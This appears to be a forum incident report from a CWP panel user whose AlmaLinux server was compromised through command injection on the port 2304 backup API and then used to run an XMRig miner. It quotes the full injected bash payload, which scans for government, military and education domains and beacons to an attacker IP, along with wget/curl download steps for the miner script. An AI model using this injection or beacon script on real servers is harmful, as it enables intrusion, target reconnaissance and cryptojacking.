Hi,
The server was hacked and a miner was launched.
Distro Name: AlmaLinux release 9.8
CWPpro version: 1.17
Also, based on log analysis, the gpt chat created a visualization of the attack.
Internet > 146.103.45.130 > CWP API :2304 > POST /v1/backup > command injection > bash -c > wget/curl [http://]146.103.45.130/ omrig.sh > XMRig 6.26.0 (polkitd-helpers, dbus-monitor-srv, systemd-logind-helpers) > 146.103.45.130:3333 > Monero mining
I immediately closed the port and deleted all the services he created. It seemed like there was nothing left in the system, but the miner sent data to the hacker's server for an hour.
I hope the developers will fix the issue with port 2304. The omrig.sh script is still available for download on this server. Please run everything in a sandbox and make the panel more secure!!!!!!!!
Start backup ;T_URL=https://my.server:2304/ bash -c #!/bin/bash T_URL=${T_URL:-"none"} URL="http://146.103.45.130:8891/dataawpdlapwdlpawdlkaowdkoawkok213ok213o" PAYLOAD='{"status": "special"}' DIRS=( "/usr/local/apache/conf.d/vhosts" "/etc/nginx/conf.d/vhosts", "/var/named/" ) PATTERNS=( "*.go.*" "*.ac.*" "*.gov" "*.gov.*" "*.edu" "*.edu.*" "*.gob.*" "*.gob" "*.mil" "*.mil.*" ) FIND_ARGS=() for i in "${!PATTERNS[@]}"; do if [ "$i" -gt 0 ]; then FIND_ARGS+=(-o) fi FIND_ARGS+=(-name "${PATTERNS[$i]}") done FOUND=0 for dir in "${DIRS[@]}"; do if [ ! -d "$dir" ]; then continue fi if find "$dir" -maxdepth 1 \( "${FIND_ARGS[@]}" \) -print -quit | grep -q .; then FOUND=1 fi done if [ "$FOUND" -eq 1 ]; then if command -v curl &> /dev/null; then # -s: silent, -o /dev/null: ignore body, -w "%{http_code}": print status code STATUS=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$URL" \ -H "Content-Type: application/json" \ -H "X-URL: $T_URL" \ -d "$PAYLOAD") # Check if HTTP status is in the 2xx success range (200-299) if [ "$STATUS" -ge 200 ] && [ "$STATUS" -lt 300 ]; then echo "ok (curl: $STATUS)" exit 0 fi fi if command -v wget &> /dev/null; then # --post-data ensures compatibility across all wget versions if wget -q -O /dev/null --header="Content-Type: application/json" --header="X-URL: $T_URL" --post-data="$PAYLOAD" "$URL"; then echo "ok (wget)" exit 0 fi fi echo "special_yes" else echo "special_no" fi;20260725115706053575a77f0cce7e3491ed9e2c1fed47
It's too bad that I can't publish the full log on the forum.